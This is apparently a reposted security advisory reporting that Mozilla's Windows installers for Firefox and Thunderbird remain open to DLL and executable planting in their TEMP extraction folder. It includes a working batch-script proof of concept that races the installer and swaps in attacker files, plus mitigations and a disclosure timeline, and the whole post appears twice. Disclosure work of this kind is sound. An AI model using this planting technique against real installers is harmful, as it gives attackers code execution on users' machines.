Hi @ll,
<http://ift.tt/1Uj8MFd; should
have fixed CVE-2014-1520 in Mozilla's executable installers for
Windows ... but does NOT!
JFTR: this type of vulnerability (really: a bloody stupid trivial
beginner's error!) is well-known and well-documented as
<http://ift.tt/1Uuempo;.
Proof of concept/demonstration:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
0. download "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe",
"Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe"
and save them in an arbitrary directory;
1. download <http://ift.tt/1Uj9ceP;
plus <http://ift.tt/1UudhxX; and
save them in an(other) arbitrary directory;
2. start your editor, copy and paste the following 10 lines and
save them as "POC.CMD" in the same directory as "SHFOLDER.DLL"
and "SENTINEL.EXE" downloaded in step 1:
:WAIT1
@If Not Exist "%TEMP%\7z*.tmp" Goto :WAIT1
For /D %%! In ("%TEMP%\7z*.tmp") Do Set foobar=%%!
Copy "%~dp0shfolder.dll" "%foobar%\shfolder.dll"
:WAIT2
@If Not Exist "%foobar%\core\maintenanceservice.exe" Goto :WAIT2
Copy "%~dp0sentinel.exe" "%foobar%\core\maintenanceservice.exe"
:WAIT3
@If Not Exist "%foobar%\core\maintenanceservice_installer.exe" Goto :WAIT3
Copy "%~dp0sentinel.exe" "%foobar%\core\maintenanceservice_installer.exe"
3. execute the batch script "POC.CMD" created in step 2;
4. execute "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe",
downloaded in step 0. and proceed as directed: notice the message
boxed displayed from the copies of "SHFOLDER.DLL" and "SENTINEL.EXE"
placed by the batch script started in step 3 in the unsafe TEMP
subdirectory created by Mozilla's vulnerable executable installers!
PWNED!
Mitigation(s):
~~~~~~~~~~~~~~
0. don't use executable installers. DUMP THEM, NOW!
1. see <http://ift.tt/1Uj7F8u; as well as
<http://ift.tt/1UuebKV;.
2. stay away from Mozilla's vulnerable installers for their Windows
software (at least until Mozilla starts to develop a sense for
the safety and security of their users).
stay tuned
Stefan Kanthak
Timeline:
~~~~~~~~~
2015-10-25 <http://ift.tt/1Uj7UjP;
not even an attempt to fix this vulnerability (check but
<http://ift.tt/1Uueu8z
upport-program/>)
2016-04-30 <http://ift.tt/1Uj9hPs;
<http://ift.tt/1Uuf8CU;
<http://ift.tt/1Uj8LAZ;
<http://ift.tt/1UueEg7;
<http://ift.tt/1Uj7qKE;
<http://ift.tt/1UueuFA;
<http://ift.tt/1Uj9OB1;
)
2016-06-15 deadline expired after 45 days, report published
Note: Only a member of this blog may post a comment.
Hi @ll,
<http://ift.tt/1Uj8MFd; should
have fixed CVE-2014-1520 in Mozilla's executable installers for
Windows ... but does NOT!
JFTR: this type of vulnerability (really: a bloody stupid trivial
beginner's error!) is well-known and well-documented as
<http://ift.tt/1Uuempo;.
Proof of concept/demonstration:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
0. download "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe",
"Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe"
and save them in an arbitrary directory;
1. download <http://ift.tt/1Uj9ceP;
plus <http://ift.tt/1UudhxX; and
save them in an(other) arbitrary directory;
2. start your editor, copy and paste the following 10 lines and
save them as "POC.CMD" in the same directory as "SHFOLDER.DLL"
and "SENTINEL.EXE" downloaded in step 1:
:WAIT1
@If Not Exist "%TEMP%\7z*.tmp" Goto :WAIT1
For /D %%! In ("%TEMP%\7z*.tmp") Do Set foobar=%%!
Copy "%~dp0shfolder.dll" "%foobar%\shfolder.dll"
:WAIT2
@If Not Exist "%foobar%\core\maintenanceservice.exe" Goto :WAIT2
Copy "%~dp0sentinel.exe" "%foobar%\core\maintenanceservice.exe"
:WAIT3
@If Not Exist "%foobar%\core\maintenanceservice_installer.exe" Goto :WAIT3
Copy "%~dp0sentinel.exe" "%foobar%\core\maintenanceservice_installer.exe"
3. execute the batch script "POC.CMD" created in step 2;
4. execute "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe",
"Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe"
downloaded in step 0. and proceed as directed: notice the message
boxed displayed from the copies of "SHFOLDER.DLL" and "SENTINEL.EXE"
placed by the batch script started in step 3 in the unsafe TEMP
subdirectory created by Mozilla's vulnerable executable installers!
PWNED!
Mitigation(s):
~~~~~~~~~~~~~~
0. don't use executable installers. DUMP THEM, NOW!
1. see <http://ift.tt/1Uj7F8u; as well as
<http://ift.tt/1UuebKV;.
2. stay away from Mozilla's vulnerable installers for their Windows
software (at least until Mozilla starts to develop a sense for
the safety and security of their users).
stay tuned
Stefan Kanthak
Timeline:
~~~~~~~~~
2015-10-25 <http://ift.tt/1Uj7UjP;
not even an attempt to fix this vulnerability (check but
<http://ift.tt/1Uueu8z
upport-program/>)
2016-04-30 <http://ift.tt/1Uj9hPs;
<http://ift.tt/1Uuf8CU;
<http://ift.tt/1Uj8LAZ;
<http://ift.tt/1UueEg7;
<http://ift.tt/1Uj7qKE;
<http://ift.tt/1UueuFA;
not even an attempt to fix this vulnerability (check but
<http://ift.tt/1Uj9OB1;
)
2016-06-15 deadline expired after 45 days, report published
[ reply ]